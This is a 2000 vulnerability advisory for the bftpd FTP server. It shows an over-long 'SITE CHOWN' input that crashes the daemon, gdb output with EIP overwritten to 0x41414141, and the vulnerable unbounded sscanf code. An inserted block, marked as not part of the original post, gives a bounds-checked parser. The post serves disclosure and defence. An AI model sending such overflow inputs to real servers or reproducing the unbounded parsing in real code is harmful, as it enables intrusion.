Subject: Potential Buffer Overflow vulnerability in bftpd-1.0.13
From: BAILLEUX Christophe (cbGROLIER.FR)
Date: Wed Dec 13 2000 - 13:13:25 CST


There is a potential buffer overflow vulnerability in the command "SITE
CHOWN"

230 User logged in.
site chown AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.AAAAAAAAAA A
550 User 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' not found.
Connection closed by foreign host.

gdb /usr/sbin/bftpd 18214
.............
Loaded symbols for /lib/libnss_compat.so.2
Reading symbols from /lib/libnsl.so.1...done.
Loaded symbols for /lib/libnsl.so.1
0x400e7514 in read () from /lib/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x $esp
0xbffffc68: 0x41414141
(gdb)

The problem is in the command_chown function in commands.c:

  void command_chown(char *params) {
      char foo[USERLEN + 1], owner[USERLEN + 1], group[USERLEN + 1], filename[256];
      int uid, gid;
      if(!strstr(params, " ")) {
          fprintf(stderr, "550 Usage: SITE CHOWN <owner>[.<group>] <filename>\r\n");
          return;
      }
      /* No field width on %[^ ] or %s: an over-long owner spec or filename
         is written past the end of foo[] / filename[]. */
      sscanf(params, "%[^ ] %s", foo, filename);
      if(strstr(foo, "."))
          /* Same problem: owner[] and group[] are filled without a bound. */
          sscanf(foo, "%[^.].%s", owner, group);
      else {
          strcpy(owner, foo);
          group[0] = '\0';
      }
      if(!sscanf(owner, "%i", &uid)) /* Is it a number? */
          if(((uid = mygetpwnam(owner, passwdfile))) < 0) {
              fprintf(stderr, "550 User '%s' not found.\r\n", owner);
              return;
          }
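An added example, not bftpd's code and not part of the original post: a bounds-checked parser for the same "<owner>[.<group>] <filename>" argument, replacing the unbounded sscanf() conversions in the excerpt above. USERLEN is assumed to be 32 here, since the post does not give bftpd's value; the probe input is constructed.

```c
#include <stdio.h>
#include <string.h>

#define USERLEN 32        /* assumed value; bftpd's real USERLEN is not given in the post */
#define FILENAME_LEN 256  /* matches filename[256] in the excerpt */

/* Parsed form of a SITE CHOWN argument: "<owner>[.<group>] <filename>". */
struct chown_args {
    char owner[USERLEN + 1];
    char group[USERLEN + 1];
    char filename[FILENAME_LEN];
};

/* Bounded replacement for the sscanf("%[^ ] %s") / sscanf("%[^.].%s") pair.
 * Every field length is measured before any copy; an over-long owner, group
 * or filename is rejected (-1) instead of being written past its buffer.
 * Unlike %s, the filename is taken as the remainder of the line. */
int parse_chown_args(const char *params, struct chown_args *out) {
    const char *sp = strchr(params, ' ');
    if (sp == NULL || sp == params) return -1;      /* need "<owner-spec> <filename>" */
    size_t speclen = (size_t)(sp - params);
    const char *fname = sp + 1;
    while (*fname == ' ') fname++;                   /* tolerate extra separating spaces */
    size_t fnlen = strlen(fname);
    if (fnlen == 0 || fnlen >= FILENAME_LEN) return -1;
    const char *dot = memchr(params, '.', speclen);
    size_t ownlen = dot ? (size_t)(dot - params) : speclen;
    size_t grplen = dot ? speclen - ownlen - 1 : 0;
    if (ownlen == 0 || ownlen > USERLEN || grplen > USERLEN) return -1;
    memcpy(out->owner, params, ownlen);
    out->owner[ownlen] = '\0';
    if (dot) memcpy(out->group, dot + 1, grplen);
    out->group[grplen] = '\0';
    memcpy(out->filename, fname, fnlen);
    out->filename[fnlen] = '\0';
    return 0;
}

/* Constructed probe modelled on the post's "site chown AAAA...A.AAAA A" line:
 * an owner field longer than USERLEN must be refused, never copied. */
int rejects_overlong_owner(void) {
    char line[USERLEN + 64];
    struct chown_args a;
    memset(line, 'A', USERLEN + 8);
    memcpy(line + USERLEN + 8, ".grp f", 7);      /* 7 bytes includes the NUL */
    return parse_chown_args(line, &a) == -1;
}

int main(void) { printf("over-long owner rejected: %s\n", rejects_overlong_owner() ? "yes" : "no"); return 0; }
```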

Workaround :

Replace in /etc/bftpd.conf

  ENABLE_SITE=yes

by

  ENABLE_SITE=no

Best regards,

--
BAILLEUX Christophe - Network & System Security Engineer
Grolier Interactive Europe-OG/CS
Voice:+33-(0)1-5545-4789 - mailto:cbgrolier.fr